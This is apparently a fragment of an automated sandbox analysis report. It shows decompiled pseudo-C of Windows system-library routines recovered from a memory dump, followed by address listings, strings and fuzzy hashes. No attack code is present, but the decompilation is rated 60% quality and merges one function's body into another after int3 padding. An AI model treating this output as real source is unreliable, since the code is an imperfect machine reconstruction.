				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E00A9EEF0(0xb77b60);
					_t134 =  *0xb77b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0xb77b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xb77b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E00A96D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E00A976E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E00B28938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E00A8B150();
													}
													_t116 = E00B26D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E00A975CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0xb78638; // 0x0
																	_t122 = L00A938A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E00A976E2(_t154);
																			goto L41;
																		}
																	} else {
																		E00A976E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L00ABFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L00A970F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E00ABFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E00ABFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E00ABFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E00ABFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E00ABFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0xb77b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0xb77b84 = _t75;
						_t73 = E00A9EB70(_t134, 0xb77b60);
						if( *0xb77b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E00A9FF60( *0xb77b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                                    0x00abfab0
                                                                                                    0x00abfab2
                                                                                                    0x00abfab3
                                                                                                    0x00abfab4
                                                                                                    0x00abfabc
                                                                                                    0x00abfac0
                                                                                                    0x00abfb14
                                                                                                    0x00abfb17
                                                                                                    0x00abfac2
                                                                                                    0x00abfac8
                                                                                                    0x00abfacd
                                                                                                    0x00abfad3
                                                                                                    0x00abfad3
                                                                                                    0x00abfadd
                                                                                                    0x00abfb18
                                                                                                    0x00abfb1b
                                                                                                    0x00abfb1d
                                                                                                    0x00abfb1e
                                                                                                    0x00abfb1f
                                                                                                    0x00abfb20
                                                                                                    0x00abfb21
                                                                                                    0x00abfb22
                                                                                                    0x00abfb23
                                                                                                    0x00abfb24
                                                                                                    0x00abfb25
                                                                                                    0x00abfb26
                                                                                                    0x00abfb27
                                                                                                    0x00abfb28
                                                                                                    0x00abfb29
                                                                                                    0x00abfb2a
                                                                                                    0x00abfb2b
                                                                                                    0x00abfb2c
                                                                                                    0x00abfb2d
                                                                                                    0x00abfb2e
                                                                                                    0x00abfb2f
                                                                                                    0x00abfb3a
                                                                                                    0x00abfb3b
                                                                                                    0x00abfb3e
                                                                                                    0x00abfb41
                                                                                                    0x00abfb44
                                                                                                    0x00abfb47
                                                                                                    0x00abfb4a
                                                                                                    0x00abfb4d
                                                                                                    0x00abfb53
                                                                                                    0x00afbdcb
                                                                                                    0x00afbdcb
                                                                                                    0x00abfb59
                                                                                                    0x00abfb5b
                                                                                                    0x00abfb5b
                                                                                                    0x00abfb5e
                                                                                                    0x00afbdd5
                                                                                                    0x00afbdd8
                                                                                                    0x00000000
                                                                                                    0x00afbdda
                                                                                                    0x00000000
                                                                                                    0x00afbdda
                                                                                                    0x00abfb64
                                                                                                    0x00abfb64
                                                                                                    0x00abfb64
                                                                                                    0x00abfb67
                                                                                                    0x00abfb6e
                                                                                                    0x00abfb70
                                                                                                    0x00abfb72
                                                                                                    0x00000000
                                                                                                    0x00abfb78
                                                                                                    0x00abfb7a
                                                                                                    0x00abfb7a
                                                                                                    0x00abfb7d
                                                                                                    0x00abfb80
                                                                                                    0x00afbddf
                                                                                                    0x00afbde1
                                                                                                    0x00000000
                                                                                                    0x00afbde3
                                                                                                    0x00000000
                                                                                                    0x00afbde3
                                                                                                    0x00abfb86
                                                                                                    0x00abfb86
                                                                                                    0x00abfb86
                                                                                                    0x00abfb8b
                                                                                                    0x00abfb90
                                                                                                    0x00abfb92
                                                                                                    0x00abfb94
                                                                                                    0x00abfb9a
                                                                                                    0x00abfb9b
                                                                                                    0x00abfba1
                                                                                                    0x00afbde8
                                                                                                    0x00afbdeb
                                                                                                    0x00afbded
                                                                                                    0x00afbeb5
                                                                                                    0x00afbeb5
                                                                                                    0x00afbebb
                                                                                                    0x00afbebd
                                                                                                    0x00afbec3
                                                                                                    0x00afbed2
                                                                                                    0x00afbedd
                                                                                                    0x00afbedd
                                                                                                    0x00afbeed
                                                                                                    0x00000000
                                                                                                    0x00afbdf3
                                                                                                    0x00afbdfe
                                                                                                    0x00afbe06
                                                                                                    0x00afbe0b
                                                                                                    0x00afbe0d
                                                                                                    0x00afbe0f
                                                                                                    0x00afbe14
                                                                                                    0x00afbe19
                                                                                                    0x00afbe20
                                                                                                    0x00afbe25
                                                                                                    0x00afbe27
                                                                                                    0x00afbe35
                                                                                                    0x00afbe39
                                                                                                    0x00afbe46
                                                                                                    0x00afbe4f
                                                                                                    0x00afbe54
                                                                                                    0x00afbe56
                                                                                                    0x00afbef8
                                                                                                    0x00afbef8
                                                                                                    0x00000000
                                                                                                    0x00afbe5c
                                                                                                    0x00afbe5c
                                                                                                    0x00afbe60
                                                                                                    0x00000000
                                                                                                    0x00afbe66
                                                                                                    0x00afbe66
                                                                                                    0x00afbe7f
                                                                                                    0x00afbe84
                                                                                                    0x00afbe87
                                                                                                    0x00afbe89
                                                                                                    0x00afbe8b
                                                                                                    0x00afbe99
                                                                                                    0x00afbe9d
                                                                                                    0x00afbea0
                                                                                                    0x00afbeac
                                                                                                    0x00afbeaf
                                                                                                    0x00afbeb1
                                                                                                    0x00afbeb3
                                                                                                    0x00afbeb3
                                                                                                    0x00000000
                                                                                                    0x00afbea2
                                                                                                    0x00afbea2
                                                                                                    0x00000000
                                                                                                    0x00afbea2
                                                                                                    0x00afbe8d
                                                                                                    0x00afbe8d
                                                                                                    0x00afbe92
                                                                                                    0x00000000
                                                                                                    0x00afbe92
                                                                                                    0x00afbe8b
                                                                                                    0x00afbe60
                                                                                                    0x00afbe3b
                                                                                                    0x00afbe3b
                                                                                                    0x00afbe3e
                                                                                                    0x00000000
                                                                                                    0x00afbe40
                                                                                                    0x00afbe40
                                                                                                    0x00afbe44
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00afbe44
                                                                                                    0x00afbe3e
                                                                                                    0x00afbe29
                                                                                                    0x00afbe29
                                                                                                    0x00000000
                                                                                                    0x00afbe29
                                                                                                    0x00afbe27
                                                                                                    0x00000000
                                                                                                    0x00abfba7
                                                                                                    0x00abfba7
                                                                                                    0x00abfbab
                                                                                                    0x00afbf02
                                                                                                    0x00abfbb1
                                                                                                    0x00abfbb1
                                                                                                    0x00abfbb8
                                                                                                    0x00abfbbd
                                                                                                    0x00abfbbd
                                                                                                    0x00abfbbf
                                                                                                    0x00abfbbf
                                                                                                    0x00abfbc5
                                                                                                    0x00abfbcb
                                                                                                    0x00abfbf8
                                                                                                    0x00abfbf8
                                                                                                    0x00abfbfa
                                                                                                    0x00000000
                                                                                                    0x00abfc00
                                                                                                    0x00abfc00
                                                                                                    0x00abfc03
                                                                                                    0x00000000
                                                                                                    0x00abfc09
                                                                                                    0x00abfc09
                                                                                                    0x00abfc0f
                                                                                                    0x00abfc15
                                                                                                    0x00abfc23
                                                                                                    0x00abfc23
                                                                                                    0x00abfc25
                                                                                                    0x00abfc27
                                                                                                    0x00abfc75
                                                                                                    0x00abfc7c
                                                                                                    0x00abfc84
                                                                                                    0x00000000
                                                                                                    0x00abfc29
                                                                                                    0x00abfc29
                                                                                                    0x00abfc2d
                                                                                                    0x00abfc30
                                                                                                    0x00afbf0f
                                                                                                    0x00000000
                                                                                                    0x00abfc36
                                                                                                    0x00abfc38
                                                                                                    0x00abfc3b
                                                                                                    0x00abfc41
                                                                                                    0x00afbf17
                                                                                                    0x00afbf19
                                                                                                    0x00afbf48
                                                                                                    0x00afbf4b
                                                                                                    0x00000000
                                                                                                    0x00afbf1b
                                                                                                    0x00afbf22
                                                                                                    0x00afbf24
                                                                                                    0x00afbf26
                                                                                                    0x00000000
                                                                                                    0x00afbf2c
                                                                                                    0x00afbf37
                                                                                                    0x00afbf39
                                                                                                    0x00afbf3b
                                                                                                    0x00000000
                                                                                                    0x00afbf41
                                                                                                    0x00afbf41
                                                                                                    0x00afbf41
                                                                                                    0x00afbf41
                                                                                                    0x00afbf45
                                                                                                    0x00000000
                                                                                                    0x00afbf45
                                                                                                    0x00afbf3b
                                                                                                    0x00afbf26
                                                                                                    0x00000000
                                                                                                    0x00abfc47
                                                                                                    0x00abfc47
                                                                                                    0x00abfc49
                                                                                                    0x00abfcb2
                                                                                                    0x00abfcb4
                                                                                                    0x00abfcb6
                                                                                                    0x00abfcdc
                                                                                                    0x00abfcdc
                                                                                                    0x00000000
                                                                                                    0x00abfcb8
                                                                                                    0x00abfcc3
                                                                                                    0x00abfcc5
                                                                                                    0x00abfcc7
                                                                                                    0x00000000
                                                                                                    0x00abfcc9
                                                                                                    0x00abfcc9
                                                                                                    0x00abfccd
                                                                                                    0x00000000
                                                                                                    0x00abfccd
                                                                                                    0x00abfcc7
                                                                                                    0x00000000
                                                                                                    0x00abfc4b
                                                                                                    0x00abfc4b
                                                                                                    0x00abfc4e
                                                                                                    0x00abfc4e
                                                                                                    0x00abfc51
                                                                                                    0x00abfc51
                                                                                                    0x00abfc54
                                                                                                    0x00abfc5a
                                                                                                    0x00abfc5c
                                                                                                    0x00abfc5f
                                                                                                    0x00abfc61
                                                                                                    0x00abfc63
                                                                                                    0x00abfc65
                                                                                                    0x00abfc67
                                                                                                    0x00abfc6e
                                                                                                    0x00abfc72
                                                                                                    0x00abfc72
                                                                                                    0x00abfc72
                                                                                                    0x00abfc72
                                                                                                    0x00abfc67
                                                                                                    0x00abfc61
                                                                                                    0x00000000
                                                                                                    0x00abfc5a
                                                                                                    0x00abfc49
                                                                                                    0x00abfc41
                                                                                                    0x00abfc30
                                                                                                    0x00abfc27
                                                                                                    0x00abfc03
                                                                                                    0x00abfbcd
                                                                                                    0x00abfbd3
                                                                                                    0x00abfbd9
                                                                                                    0x00abfbdc
                                                                                                    0x00abfbde
                                                                                                    0x00abfc99
                                                                                                    0x00abfc9b
                                                                                                    0x00abfc9d
                                                                                                    0x00abfcd5
                                                                                                    0x00abfcd5
                                                                                                    0x00abfc89
                                                                                                    0x00abfc89
                                                                                                    0x00000000
                                                                                                    0x00abfc9f
                                                                                                    0x00abfc9f
                                                                                                    0x00abfca3
                                                                                                    0x00000000
                                                                                                    0x00abfca3
                                                                                                    0x00000000
                                                                                                    0x00abfbe4
                                                                                                    0x00abfbe4
                                                                                                    0x00abfbe4
                                                                                                    0x00abfbe4
                                                                                                    0x00abfbe9
                                                                                                    0x00abfbf2
                                                                                                    0x00000000
                                                                                                    0x00abfbf2
                                                                                                    0x00abfbde
                                                                                                    0x00abfbcb
                                                                                                    0x00abfbab
                                                                                                    0x00abfc8b
                                                                                                    0x00abfc8b
                                                                                                    0x00abfc8c
                                                                                                    0x00abfb80
                                                                                                    0x00abfb72
                                                                                                    0x00abfb5e
                                                                                                    0x00abfc8d
                                                                                                    0x00abfc91
                                                                                                    0x00abfadf
                                                                                                    0x00abfadf
                                                                                                    0x00abfae1
                                                                                                    0x00abfae4
                                                                                                    0x00abfae7
                                                                                                    0x00abfaec
                                                                                                    0x00abfaf8
                                                                                                    0x00abfb00
                                                                                                    0x00abfb07
                                                                                                    0x00abfb0f
                                                                                                    0x00abfb0f
                                                                                                    0x00abfb07
                                                                                                    0x00000000
                                                                                                    0x00abfaf8
                                                                                                    0x00abfadd

                                                                                                    Strings
                                                                                                    • 2U, xrefs: 00ABFAF1
                                                                                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00AFBE0F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 2U$*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                    • API String ID: 0-1340132430
                                                                                                    • Opcode ID: 22b66bfa50430e6044b04a3723b4642dcfd42bf1699ac3ebd13941c786a4a818
                                                                                                    • Instruction ID: 07a1eca9263f7aa2ce840c83c86832463d0e07b1769d8b0eb03f50d1e0187a0c
                                                                                                    • Opcode Fuzzy Hash: 22b66bfa50430e6044b04a3723b4642dcfd42bf1699ac3ebd13941c786a4a818
                                                                                                    • Instruction Fuzzy Hash: DAA10471B10609CFDB25DBA8C8507FABBB8AF49710F184579F906DB692DB30DC818B90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B4E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 60%
                                                                                                    			E00B4E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E00B4BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E00B4BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E00B4AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E00AC9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E00B4A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E00B4A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E00AC9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E00B4A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E00B4A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E00AA2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E00A9B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E00A9FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E00AA7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E00B3FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                                                                    0x00b4e547
                                                                                                    0x00b4e549
                                                                                                    0x00b4e54f
                                                                                                    0x00b4e553
                                                                                                    0x00b4e557
                                                                                                    0x00b4e55a
                                                                                                    0x00b4e55c
                                                                                                    0x00b4e55f
                                                                                                    0x00b4e561
                                                                                                    0x00b4e567
                                                                                                    0x00b4e56b
                                                                                                    0x00b4e7e2
                                                                                                    0x00000000
                                                                                                    0x00b4e571
                                                                                                    0x00b4e575
                                                                                                    0x00b4e577
                                                                                                    0x00b4e57b
                                                                                                    0x00b4e57c
                                                                                                    0x00b4e57d
                                                                                                    0x00b4e57e
                                                                                                    0x00b4e57f
                                                                                                    0x00b4e588
                                                                                                    0x00b4e58f
                                                                                                    0x00b4e591
                                                                                                    0x00b4e592
                                                                                                    0x00b4e592
                                                                                                    0x00b4e596
                                                                                                    0x00b4e59e
                                                                                                    0x00b4e5a0
                                                                                                    0x00b4e5a6
                                                                                                    0x00b4e61d
                                                                                                    0x00b4e61d
                                                                                                    0x00b4e621
                                                                                                    0x00b4e623
                                                                                                    0x00b4e630
                                                                                                    0x00b4e630
                                                                                                    0x00b4e7e6
                                                                                                    0x00b4e7eb
                                                                                                    0x00b4e7ed
                                                                                                    0x00b4e7f4
                                                                                                    0x00b4e7fa
                                                                                                    0x00b4e7ff
                                                                                                    0x00b4e7ff
                                                                                                    0x00b4e80a
                                                                                                    0x00b4e812
                                                                                                    0x00b4e812
                                                                                                    0x00b4e5ab
                                                                                                    0x00b4e5b4
                                                                                                    0x00b4e5b9
                                                                                                    0x00b4e5be
                                                                                                    0x00b4e5c0
                                                                                                    0x00b4e5c2
                                                                                                    0x00b4e5c8
                                                                                                    0x00b4e5c9
                                                                                                    0x00b4e5cb
                                                                                                    0x00b4e5cc
                                                                                                    0x00b4e5d5
                                                                                                    0x00b4e5e4
                                                                                                    0x00b4e5f1
                                                                                                    0x00b4e5f8
                                                                                                    0x00b4e5f8
                                                                                                    0x00b4e5d5
                                                                                                    0x00b4e602
                                                                                                    0x00b4e616
                                                                                                    0x00b4e63d
                                                                                                    0x00b4e644
                                                                                                    0x00b4e64d
                                                                                                    0x00b4e652
                                                                                                    0x00b4e657
                                                                                                    0x00b4e659
                                                                                                    0x00b4e65b
                                                                                                    0x00b4e661
                                                                                                    0x00b4e662
                                                                                                    0x00b4e664
                                                                                                    0x00b4e665
                                                                                                    0x00b4e66e
                                                                                                    0x00b4e67d
                                                                                                    0x00b4e68a
                                                                                                    0x00b4e691
                                                                                                    0x00b4e691
                                                                                                    0x00b4e66e
                                                                                                    0x00b4e6b0
                                                                                                    0x00000000
                                                                                                    0x00b4e6b6
                                                                                                    0x00b4e6bd
                                                                                                    0x00b4e6c7
                                                                                                    0x00b4e6d7
                                                                                                    0x00b4e6d9
                                                                                                    0x00b4e6db
                                                                                                    0x00b4e6de
                                                                                                    0x00b4e6e3
                                                                                                    0x00b4e6f3
                                                                                                    0x00b4e6fc
                                                                                                    0x00b4e700
                                                                                                    0x00b4e700
                                                                                                    0x00b4e704
                                                                                                    0x00b4e70a
                                                                                                    0x00b4e70a
                                                                                                    0x00b4e713
                                                                                                    0x00b4e716
                                                                                                    0x00b4e719
                                                                                                    0x00b4e720
                                                                                                    0x00b4e761
                                                                                                    0x00b4e76b
                                                                                                    0x00b4e774
                                                                                                    0x00b4e77a
                                                                                                    0x00b4e77a
                                                                                                    0x00b4e78a
                                                                                                    0x00b4e791
                                                                                                    0x00b4e799
                                                                                                    0x00b4e79b
                                                                                                    0x00b4e79f
                                                                                                    0x00b4e7aa
                                                                                                    0x00b4e7c0
                                                                                                    0x00b4e7ac
                                                                                                    0x00b4e7b2
                                                                                                    0x00b4e7b9
                                                                                                    0x00b4e7b9
                                                                                                    0x00b4e7c7
                                                                                                    0x00b4e806
                                                                                                    0x00000000
                                                                                                    0x00b4e7c9
                                                                                                    0x00b4e7d1
                                                                                                    0x00b4e7d8
